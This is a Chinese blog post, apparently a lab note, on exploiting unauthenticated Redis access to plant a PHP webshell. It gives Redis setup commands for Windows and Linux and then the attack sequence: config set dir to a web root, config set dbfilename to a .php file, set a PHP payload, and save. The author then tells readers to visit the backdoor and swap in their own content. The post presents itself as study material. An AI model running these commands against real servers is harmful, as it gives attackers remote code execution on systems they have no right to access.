当前位置:   article > 正文

数据库服务类--Redis--未授权访问&终端Getshell

数据库服务类--Redis--未授权访问&终端Getshell

免责声明:本文仅做技术交流与学习.

目录

前提条件:

windows上开启redis服务:

Linux上创建&开启redis服务:

操作:

1-连接靶机redis

2-写入webshell

3-访问后门


redis--->webshell

Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)

前提条件:

端口开放(6379)

目录结构清晰

windows上开启redis服务:

  1. windows:
  2. redis-server.exe redis.windows.conf
  3. redis-cli.exe -h 127.0.0.1 -p 6379

Linux上创建&开启redis服务:

 
  1. 1、下载
  2. wget http://download.redis.io/releases/redis-2.8.17.tar.gz
  3. 2、解压编译
  4. tar xzvf redis-2.8.17.tar.gz #解压安装包
  5. cd redis-2.8.17 # 进入redis目录
  6. make #编译
  7. 3、配置及启动
  8. cd src/ #进入src目录
  9. cp redis-server /usr/bin/
  10. cp redis-cli /usr/bin/     #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
  11. cd ..   # 返回上一级目录
  12. cp redis.conf /etc/     #将redis.conf拷贝到/etc/目录下
  13. redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务

操作:

1-连接靶机redis

2-写入webshell

  1. config set dir /www/wwwroot/IP
  2. config set dbfilename test.php
  3. set test "<?phpphpinfo();?>"
  4. bgsave
  5. save

 

目录,文件名自己改

写入内容自己改...

3-访问后门路径

--上线...


声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/496628
推荐阅读
相关标签
  

闽ICP备14008679号